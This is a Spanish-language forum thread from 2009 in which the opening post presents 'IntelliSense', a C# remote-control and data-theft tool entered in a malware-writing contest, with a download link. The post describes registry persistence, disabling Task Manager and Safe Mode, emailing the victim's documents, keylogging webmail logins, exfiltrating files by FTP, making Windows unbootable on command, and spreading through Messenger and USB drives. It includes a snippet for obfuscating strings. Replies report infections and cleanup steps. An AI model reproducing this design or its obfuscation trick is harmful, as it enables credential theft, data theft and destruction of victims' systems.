Foro de elhacker.net

Seguridad Informática => Abril negro => Mensaje iniciado por: 43H4FH44H45H4CH49H56H45H en 18 Mayo 2009, 02:30 am



Título: IntelliSense control via web - robo de información
Publicado por: 43H4FH44H45H4CH49H56H45H en 18 Mayo 2009, 02:30 am
Autor: 43H4FH44H45H4CH49H56H45H
Nombre de la Herramienta:  IntelliSense
Lenguaje: C#.NET
Descripcion:
IntelliSense es una técnica que se me ocurrió para sacar información  y obtener control remoto de una PC o Red enviando ordenes vía web desde cualquier equipo público o privado y cualquier Sistema Operativo con un navegador o cliente FTP.
IntelliSense puede ser aplicado al lenguaje de programación que más nos guste.
Como funciona?
Al iniciar el programa verificara si se encuentra en una cuenta de  Administrador u otro tipo, dependiendo de la cuenta elegirá donde se copiara y si modificara el registro para el auto inicio, deshabilitado del Safe Mode y otras cosas.
Una vez realizada la autocopia listara los archivos que se encuentren en Mis Documentos y el Escritorio para enviarlos vía mail (escogí Gmail para la demostración) a nuestra cuenta además de algunos datos de la víctima. Luego empezara a leer las ordenes web que se encuentren en un archivo "1.txt" que tengamos alojado en alguna pagina web con el siguiente formato:
"PC:ORDEN"
Donde "PC" puede corresponder a la IP pública, IP privada, Nombre de Usuario o Nombre de Usuario de Dominio  para poder enviar la orden a una máquina especifica y si necesitáramos enviarla a todos los PC's se puede usar ALL.
"ORDEN" se refiere a la orden que enviamos a la PC el diseño actual cuenta con
4 ordenes:
CAPTURA: que envía vía mail una captura de pantalla.
KILL: que reemplaza los archivos principales de arranque para evitar el inicio de Windows y reinicia el equipo.
KEYLOG: que envía los datos sustraídos (si los hubiera) de cuentas de correo (páginas en español) como GMAIL, Windows Live Messenger, Hotmail ,Yahoo u otras que especifiquemos.
default: que envía por FTP uno, varios o todos los archivos que queramos utilizando Winrar para comprimirlos, si por ejemplo pusiéramos en la orden:
"*.*" enviara todos los archivos listados
"*.JPG" enviara solo los archivos con dicha extensión.
"documentos.doc" enviara dicho archivo.

Tb cuenta con métodos de protección matando el proceso del Task Manager y si se ingresa a la carpeta donde se encuentre activara la protección igual que con "KILL".
El keylogger solo se activa cuando se ingresa a las páginas que especifiquemos  y cada media hora si hay datos que enviar lo hará vía mail.
En la propagación por Messenger lista todos los contactos que se encuentren en la cuenta actual e ira enviando un link de descarga y una copia de si mismo comprimida a cada contacto, si el contacto esta "conectado" recibirá el link de descarga mas la copia comprimida, en otra caso recibirá solo el link de descarga.
En la replicación por USB listara las carpetas de la unidad USB y las ocultara para luego crear copias de sí mismo con los nombres de dichas carpetas (ya se ha visto en replicación USB).
Además cuenta con la posibilidad de complicar un poco la lectura de los string's utilizados mediante conversión de cada carácter en su valor decimal, para automatizar esto se puede usar un pequeño programa que tenga 3  textBox y un button con el siguiente código:

Código
  1. textBox2.Text = "";
  2. foreach (char a in textBox1.Text)
  3. {
  4. textBox2.Text +=  Convert.ToInt32(a) + " ";
  5. }
  6. textBox3.Text = @"int[] variable = {" + textBox2.Text.Trim ().Replace(" ", ",") + "};";



Código
  1. string cadena = "";
  2.  
  3. foreach (int i in variable)
  4. {
  5.  cadena  += encod(i);
  6. }
  7.  
  8.  
  9. private string encod(int num)
  10. {
  11. string codif = char.ConvertFromUtf32(num);
  12. return codif;
  13. }

Un ejemplo de su aplicación está  en "private void regist()". Además la modificación al registro permite que la autocopia al sistema tenga cualquier extensión, es decir si se copiara como *.txt igualmente se ejecutaría.

Todavía falta agregar y corregir algunos detalles como detección y captura de cámaras disponibles y algunas cosas más.
Link de descarga del proyecto:


http://www.4shared.com/file/106746397/2040d87e/IntelliSense.html (http://www.4shared.com/file/106746397/2040d87e/IntelliSense.html)

...




Título: Re: IntelliSense control via web - robo de información
Publicado por: zoneh en 24 Mayo 2009, 23:26 pm
Hola 43H4FH44H45H4CH49H56H45H he bajado el programa y parece que ya me infecte xq me elimino la opcion del administrador de tareas y tambien elimino el comando ejecutar de la barra de inicio, como podria desinfectarme, podrias decirme?


Título: Re: IntelliSense control via web - robo de información
Publicado por: bomba1990 en 25 Mayo 2009, 00:43 am
hola hermano a mi me paso lo mismo. jajaj estamos iguales pero tienes dos formas una restaura el sistema. o puedes entrar a cmd en c\windows\system32\cmd y utilisas taskkill para matar los procesos del virus y despues con el comando reg eliminas currnt user y local machine \microsoft\windows\currnt vrsion\policies\  eliminas la clave que dise algo asi como disable taskkmanagr y otra que dice run. y ya esta. reinicias el sistema. si te da ladilla editar el registro buscat un programa por ahi de esos que acomodan el registro solo en sangoogle encontraras. disculpa por lo mal escrito pero el teclado esta malo.


Título: Re: IntelliSense control via web - robo de información
Publicado por: track1 en 13 Julio 2009, 11:29 am
XDDDD porque no han borrado este post????


Título: Re: IntelliSense control via web - robo de información
Publicado por: JAntrax666 en 14 Julio 2009, 18:39 pm
jajajaj
Hola 43H4FH44H45H4CH49H56H45H he bajado el programa y parece que ya me infecte xq me elimino la opcion del administrador de tareas y tambien elimino el comando ejecutar de la barra de inicio, como podria desinfectarme, podrias decirme?


Jamas Respondio x)  :D


Título: Re: IntelliSense control via web - robo de información
Publicado por: n3fisto en 14 Julio 2009, 18:52 pm
Mmmmm uso a unos cuantos para caer y la respuesta del millon por que no respondio¿?¿?¿?¿


Título: Re: IntelliSense control via web - robo de información
Publicado por: Jaixon Jax en 16 Julio 2009, 05:03 am
  ;-) ;-) ;-) ;-) ;-) ;-)

  Jeje Tremenda aplicacion y nada mas publico esto del codigo:

 
Código:
textBox2.Text = "";foreach (char a in textBox1.Text){ textBox2.Text +=  Convert.ToInt32(a) + " ";}textBox3.Text = @"int[] variable = {" + textBox2.Text.Trim ().Replace(" ", ",") + "};";




Código
string cadena = ""; foreach (int i in variable){  cadena  += encod(i);}  private string encod(int num){string codif = char.ConvertFromUtf32(num);return codif;}

Para mi que este se levanto hoy con ganas de joderce a unos cuantos y lo logro, yo no se por que rayos descargan aplicaciones sin siquiera ver su codigo fuente :¬¬ :¬¬ :¬¬ . Lo que se acostumbra aqui es publicar puro codigo y si el que postea es de confianza puede darse el lujo de publicar exes.. ;) ;) ;)

 




Título: Re: IntelliSense control via web - robo de información
Publicado por: bomba1990 en 16 Julio 2009, 05:44 am
hola hermano jaixon jax, te agradeceria que averiguaras un poquito mejor antes de sacar conjeturas sobre los post. este post lo hicieron para el concurso de abril negro y claro que dentro del archivo viene el codigo fuente y totdo lo demas pero habeces la gente inexperta(me incluyo) se confunda y le da click donde no es y se infecta pero no por eso podemos decir que esto lo hicieron par ajoder a la gnete que lo descague.

OJO: esto es solo para aclarar, no para mas nada.